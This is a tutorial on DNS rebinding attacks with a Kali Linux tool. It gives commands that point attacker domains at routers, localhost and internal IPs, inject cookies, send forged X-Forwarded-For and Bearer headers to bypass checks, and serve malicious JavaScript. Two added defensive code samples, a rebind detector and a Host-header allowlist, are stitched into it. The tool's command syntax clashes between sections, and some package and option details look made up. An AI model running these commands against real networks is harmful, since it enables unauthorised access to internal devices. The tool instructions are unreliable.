What is DNS Rebinding?
DNS rebinding is a network attack technique that circumvents the same-origin policy in web browsers by rapidly changing the IP address associated with a domain name. The DNS-rebind tool in Kali Linux is designed to help security professionals test for DNS rebinding vulnerabilities in web applications and networks.
How DNS Rebinding Works
- Initial Resolution: The victim’s browser resolves a malicious domain to an attacker-controlled IP address
- Session Establishment: The browser connects to this IP, establishing a same-origin context
- DNS Record Change: The attacker changes the DNS record to point to a target IP (often localhost or internal network)
- Bypass Protection: The browser continues to trust the domain despite the IP change, allowing access to internal services
Installation
The DNS-rebind tool is typically included in Kali Linux by default. If not present, you can install it:
sudo apt update
sudo apt install dnsrebind
Alternatively, you can use other DNS rebinding tools like rebind or sing:
sudo apt install rebind sing
Basic Usage
Simple DNS Rebinding Server
dnsrebind --interface eth0 --domain malicious.example.com --targets 127.0.0.1,192.168.1.1
This sets up a DNS server that alternates between returning your server’s IP and the target IPs when queried for malicious.example.com.
Advanced Usage
Custom TTL and Rotation
dnsrebind --interface eth0 --domain test.example.com --targets 192.168.1.1,192.168.1.2 --ttl 1 --rotation-interval 5
- --ttl 1: Sets DNS TTL to 1 second (makes rebinding faster)
- --rotation-interval 5: Rotates between IPs every 5 seconds
Using with Web Server
dnsrebind --interface eth0 --domain evil.com --targets 127.0.0.1 --http-port 80 --http-response ""
This serves malicious JavaScript when the domain first resolves to your server.
Command-Line Options
| Option | Description |
|---|---|
| -i | Network interface to bind to (e.g., eth0, wlan0) |
| -d | Your registered domain name (e.g., attacker.com) |
| -u | Basic Authentication username (default: admin) |
| -a | Basic Authentication password (default: admin) |
| -r | Initial URL path (default: /) |
| -t | Comma-separated list of target IPs (default: client’s IP) |
| -n | Callback interval in milliseconds (default: 2000 / 2 sec) |
| -p | Target port (default: 80) |
| -c | Callback port (default: 81) |
| -C | Set a cookie for the client (e.g., sessionid=1234) |
| -H | File containing HTTP headers to send to the target |
How It Works
- DNS Rebinding Setup
  - The tool runs a DNS server that alternates between:
    - The attacker’s IP (initial response)
    - The target IP (after rebinding)
  - The browser trusts the domain but gets redirected to internal services.
- Exploitation Flow
  - Victim visits attacker.com → resolves to attacker’s IP.
  - JavaScript keeps making requests → DNS changes to internal-ip.
  - Browser treats it as same-origin → bypasses SOP.
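The alternation described above leaves a recognisable trace in resolver logs: one name answers a client with a public address and, seconds later, with an internal one, both at a very low TTL. The following detection sketch is an added example, not part of the tool or the original tutorial; the log tuple layout, LOCAL_ZONES, and the window and TTL thresholds are assumptions, and the sample log is constructed.

```python
import ipaddress

# Constructed sample resolver log: (epoch seconds, client, qname, answer, TTL).
SAMPLE_LOG = [
    (1000, "10.0.0.23", "rebind.example.com", "203.0.113.10", 1),
    (1004, "10.0.0.23", "rebind.example.com", "192.168.1.1", 1),
    (1000, "10.0.0.23", "www.example.org", "198.51.100.7", 300),
    (1200, "10.0.0.23", "www.example.org", "198.51.100.8", 300),
    (1010, "10.0.0.40", "printer.corp.example", "10.0.0.9", 60),
]
LOCAL_ZONES = ("corp.example",)  # assumption: zones allowed to hold internal IPs
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]


def is_internal(ip):
    """True for RFC 1918, loopback, link-local, 0.0.0.0/8 and IPv6 ULA addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr.version == n.version and addr in n for n in INTERNAL_NETS)


def in_local_zone(name):
    """Match on whole labels so evilcorp.example is not treated as corp.example."""
    return any(name == z or name.endswith("." + z) for z in LOCAL_ZONES)


def find_rebinds(log, window=60, max_ttl=10):
    """Return (client, qname, public_ip, internal_ip) for each name outside
    LOCAL_ZONES that answered a client with a public address and then, within
    `window` seconds, an internal one, both with TTL <= max_ttl."""
    last_public = {}  # (client, qname) -> (timestamp, ip) of last public answer
    hits = []
    for ts, client, qname, ip, ttl in sorted(log):
        name = qname.rstrip(".").lower()
        if in_local_zone(name) or ttl > max_ttl:
            continue
        key = (client, name)
        if not is_internal(ip):
            last_public[key] = (ts, ip)
        elif key in last_public and ts - last_public[key][0] <= window:
            hits.append((client, name, last_public[key][1], ip))
    return hits


if __name__ == "__main__":
    for hit in find_rebinds(SAMPLE_LOG):
        print("possible rebind:", hit)
```

Resolvers can also refuse such answers outright, for example with dnsmasq's stop-dns-rebind option or Unbound's private-address setting.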
Basic Usage Examples
1. Simple DNS Rebinding Attack
sudo dns-rebind -i eth0 -d evil.com -t 192.168.1.1,127.0.0.1
- Binds to eth0.
- Uses evil.com for rebinding.
- Alternates between the attacker’s IP and 192.168.1.1 (internal) & 127.0.0.1 (localhost).
2. With Basic Authentication
sudo dns-rebind -i eth0 -d test.com -u admin -a password -t 10.0.0.1
- Forces authentication (admin:password).
- Targets 10.0.0.1.
3. Custom Port & Faster Callback
sudo dns-rebind -i eth0 -d rebind.me -t 192.168.1.1 -p 8080 -n 500
- Targets port 8080.
- Polls every 500ms (faster rebinding).
Advanced Usage
1. Setting Cookies
sudo dns-rebind -i eth0 -d hijack.com -C "PHPSESSID=1234" -t 10.10.10.1
- Injects a cookie (PHPSESSID=1234) into requests.
2. Custom HTTP Headers (For SSRF/API Exploits)
Create a file (headers.txt):
Host: internal-api.local
X-Forwarded-For: 127.0.0.1
Authorization: Bearer xyz123
Then run:
sudo dns-rebind -i eth0 -d api-attack.com -H headers.txt -t 172.16.1.1
- Sends custom headers to bypass security checks.
3. Targeting Multiple IPs
sudo dns-rebind -i eth0 -d multi-rebind.com -t 192.168.1.1,192.168.1.2,10.0.0.1
- Rotates between multiple internal IPs.
Real-World Use Cases
- Testing Local Network Services: Access routers, IoT devices, or internal web interfaces that would normally be blocked by same-origin policy
- Bypassing Firewalls: Reach internal services that are firewalled from external access
- Web Application Testing: Test for vulnerabilities in web apps that don’t properly validate host headers
- SSRF Exploitation: Combine with Server-Side Request Forgery vulnerabilities
- Browser Security Research: Study how different browsers handle DNS changes
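After a rebind the browser still sends the attacker's domain in the Host header, so an internal service that only answers for its own names rejects the request. The WSGI middleware below is an added example of that check, not code from the tool or the original tutorial; ALLOWED_HOSTS, HostAllowlist, demo_app and status_for are hypothetical names and the requests are constructed.

```python
ALLOWED_HOSTS = {"router.lan", "192.168.1.1", "localhost", "127.0.0.1"}  # assumption


def host_name(header):
    """Return the lower-cased host part of a Host header, without the port."""
    host = header.strip().lower()
    if host.startswith("["):               # IPv6 literal such as [::1]:8080
        end = host.find("]")
        return host[1:end] if end != -1 else ""
    if ":" in host:
        host = host.rsplit(":", 1)[0]      # drop :port
    return host.rstrip(".")                # tolerate a trailing root dot


class HostAllowlist:
    """WSGI middleware: answer 400 unless Host names this service."""

    def __init__(self, app, allowed):
        self.app = app
        self.allowed = {h.lower() for h in allowed}

    def __call__(self, environ, start_response):
        if host_name(environ.get("HTTP_HOST", "")) not in self.allowed:
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"unknown Host\n"]
        return self.app(environ, start_response)


def demo_app(environ, start_response):
    """Stand-in for the internal admin interface being protected."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"admin panel\n"]


def status_for(host_header):
    """Run one constructed request through the middleware, return its status."""
    seen = []
    app = HostAllowlist(demo_app, ALLOWED_HOSTS)
    app({"HTTP_HOST": host_header}, lambda status, headers: seen.append(status))
    return seen[0]


if __name__ == "__main__":
    for h in ("192.168.1.1:8080", "evil.com", "Router.LAN.", ""):
        print(repr(h), "->", status_for(h))
```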
Troubleshooting Tips
- Permission Issues:
  sudo dnsrebind [...]
  DNS servers typically need root privileges to bind to port 53.
- Port Conflicts:
  netstat -tulnp | grep 53
  Stop any existing DNS servers before running dnsrebind.
- Browser Caching:
  - Use Chrome with --dns-prefetch-disable flag
  - Test in private browsing mode
  - Clear DNS cache between tests
- No Response:
  - Verify your interface is correct with ifconfig
  - Check firewall rules (sudo ufw status)
- TTL Issues:
  - Lower TTL values make attacks more reliable
  - Some ISPs ignore very low TTLs
- Debugging:
  Use --verbose flag and monitor with:
  sudo tcpdump -i eth0 udp port 53
Advanced Techniques
Combining with Other Tools
Use with ngrok or serveo for external testing:
ssh -R 80:localhost:80 serveo.net
dnsrebind --domain rebind.serveo.net --targets 127.0.0.1
Custom Web Server Payloads
Create an HTML file with malicious JavaScript, then:
dnsrebind --domain evil.com --targets 192.168.1.1 --http-port 80 --http-response "$(cat payload.html)"